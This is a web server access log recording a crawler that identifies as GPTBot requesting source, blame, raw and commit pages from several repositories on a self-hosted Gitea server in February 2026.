- GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 886] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:16:08:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 10237] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:16:08:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/investing_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 10941] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__" -[17/Feb/2026:16:08:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/investing_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 10909] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__" -[17/Feb/2026:16:08:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:16:08:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10082] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:16:08:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:16:08:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11096] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:16:08:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/index.html?display=rendered" [Client 74.7.227.38] [Length 10927] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/index.html" -[17/Feb/2026:16:08:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 9954] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:16:08:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 558] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:16:08:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 11316] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:16:08:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/docker-compose.yml?display=source" [Client 74.7.227.38] [Length 11909] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/docker-compose.yml" -[17/Feb/2026:16:08:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/investing_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 9929] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/investing_fetcher.cpython-312.pyc" -[17/Feb/2026:16:08:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/investing_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 9909] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/investing_fetcher.cpython-312.pyc" -[17/Feb/2026:16:08:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/investing_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 16411] [Gzip 9.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/investing_fetcher.cpython-312.pyc" -[17/Feb/2026:16:08:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/investing_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 16378] [Gzip 9.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/investing_fetcher.cpython-312.pyc" -[17/Feb/2026:16:08:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/investing_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 2530] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/investing_fetcher.cpython-312.pyc" -[17/Feb/2026:16:08:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/investing_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 2530] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/investing_fetcher.cpython-312.pyc" -[17/Feb/2026:16:08:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/update_status.py?display=rendered" [Client 74.7.227.38] [Length 10886] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/update_status.py" -[17/Feb/2026:16:08:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/update_status.py?display=source" [Client 74.7.227.38] [Length 13014] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/update_status.py" -[17/Feb/2026:16:08:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 21356] [Gzip 6.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:08:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11107] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:08:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11105] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:08:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 21358] [Gzip 6.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:08:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11112] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:08:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11109] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:08:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 21354] [Gzip 6.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:08:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11109] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:08:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fdata%2fkeys.json" [Client 74.7.227.38] [Length 23452] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/keys.json" -[17/Feb/2026:16:08:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/krx_gold_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 10911] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__" -[17/Feb/2026:16:08:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/krx_gold_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 10941] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__" -[17/Feb/2026:16:08:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/calculator.py?display=source" [Client 74.7.227.38] [Length 13094] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/calculator.py" -[17/Feb/2026:16:08:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/database.py?display=rendered" [Client 74.7.227.38] [Length 10948] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/database.py" -[17/Feb/2026:16:08:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/fetcher.py?display=rendered" [Client 74.7.227.38] [Length 10944] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/fetcher.py" -[17/Feb/2026:16:08:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/fetcher.py?display=rendered" [Client 74.7.227.38] [Length 10974] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/fetcher.py" -[17/Feb/2026:16:08:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/.Notebook" [Client 74.7.227.38] [Length 10524] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver" -[17/Feb/2026:16:08:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/update_status.py?display=rendered" [Client 74.7.227.38] [Length 10888] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/update_status.py" -[17/Feb/2026:16:08:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?q=&sort=leastcomplete&state=closed" [Client 74.7.227.38] [Length 8506] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones?sort=mostcomplete&state=closed" -[17/Feb/2026:16:08:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&state=open&type=all" [Client 74.7.227.38] [Length 9978] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls" -[17/Feb/2026:16:08:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 11567] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/.vscode" -[17/Feb/2026:16:08:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/krx_gold_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 9907] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/krx_gold_fetcher.cpython-312.pyc" -[17/Feb/2026:16:08:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/krx_gold_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 9934] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/krx_gold_fetcher.cpython-312.pyc" -[17/Feb/2026:16:08:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/krx_gold_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 13360] [Gzip 6.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/krx_gold_fetcher.cpython-312.pyc" -[17/Feb/2026:16:08:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/krx_gold_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 13393] [Gzip 6.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/krx_gold_fetcher.cpython-312.pyc" -[17/Feb/2026:16:08:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/krx_gold_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 1123] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/krx_gold_fetcher.cpython-312.pyc" -[17/Feb/2026:16:08:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/krx_gold_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 1123] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/krx_gold_fetcher.cpython-312.pyc" -[17/Feb/2026:16:08:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_upload/main/.Notebook" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook" -[17/Feb/2026:16:08:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_upload/main/.Notebook" -[17/Feb/2026:16:08:46 +0000] - 200 200 - GET https 